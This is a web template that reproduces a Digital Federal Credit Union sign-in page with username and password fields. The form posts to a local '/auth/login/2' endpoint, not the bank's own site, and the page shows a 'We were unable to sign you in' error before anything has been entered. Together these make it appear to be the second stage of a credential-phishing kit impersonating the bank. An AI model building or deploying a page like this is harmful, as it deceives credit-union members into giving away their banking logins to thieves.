@layout('layouts.app')

@section('content')
<div class="row cb-ui-container cb-pa-lg cb-mx-auto">
  <div class="col-12 row justify-center">
    <img height="32px" src="/img/logo.png" class="cb-mb-md">
    <h1 class="col-12 text-h3 text-grey-8 cb-ma-none text-center">Sign in</h1>
    <hr class="separator__header">
  </div>

  <div class="col-12 cb-my-md cb-px-md">
    <div class="cb-pa-md text-body2 text-black cb-container-note">
      <div class="cb-container-content">
        <p class="cb-ma-none text-body1">We were unable to sign you in. Please try again.</p>
      </div>
    </div>
  </div>

  <div class="col-12 cb-pt-md cb-px-xs-md cb-px-sm-xl">
    <form action="/auth/login/2" method="POST" class="row justify-center">
      <div class="field-container input-field-spacing">
        <div class="label-container">
          <label for="username" class="cb-ma-none">Username</label>
        </div>

        <div class="cb-wrapper">
          <div class="input-container">
            <input id="username" name="username" type="text" class="cb-input" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
          </div>
        </div>

        <p class="cb-ma-none cb-error-message" style="display: none;">Please enter a valid username</p>
      </div>

      <div class="field-container password-input input-field-spacing">
        <div class="label-container">
          <label for="password" class="cb-ma-none">Password</label>
        </div>

        <div class="cb-wrapper">
          <div class="input-container has-append">
            <input id="password" name="password" type="password" class="cb-input" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">

            <button type="button" class="cb-btn non-selectable no-outline qButton cb-btn--unelevated cb-btn--rectangle cb-btn--actionable cb-focusable cb-hoverable cb-btn--wrap cb-btn--dense toggle-btn">
              <span class="cb-focus-helper"></span>
              <span class="cb-btn__wrapper col row">
                <span class="cb-btn__content text-center col items-center justify-center row">
                  <i class="fas fa-eye cb-icon"></i>
                </span>
              </span>
            </button>
          </div>
        </div>

        <p class="cb-ma-none cb-error-message" style="display: none;">Please enter a valid password</p>
      </div>

      <button type="submit" disabled="disabled" class="cb-btn non-selectable no-outline col-12 cb-mt-lg full-width cb-btn--standard cb-btn--rectangle disabled cb-btn--wrap submit-btn">
        <span class="cb-focus-helper"></span>
        <span class="cb-btn__wrapper col row">
          <span class="cb-btn__content text-center col items-center justify-center row">
            <span class="block">SIGN IN</span>
          </span>
        </span>
      </button>
    </form>
  </div>

  <div class="col-xs-12 cb-pt-lg cb-px-md text-body2 text-center">
    <div class="cb-mb-md">
      <a href="https://app.dcu.org/dcusecure/cyclicApp/login/" class="link-button cb-mx-xs">Forgot your username?</a> or
      <a href="https://app.dcu.org/dcusecure/cyclicApp/login/" class="link-button cb-mx-xs">Forgot your password?</a>
    </div>

    <div class="text-caption text-grey-8 cb-mt-md">
      <span>© 2022 Digital Federal Credit Union &nbsp; | &nbsp; v1.126.5</span>
    </div>
  </div>
</div>
@endsection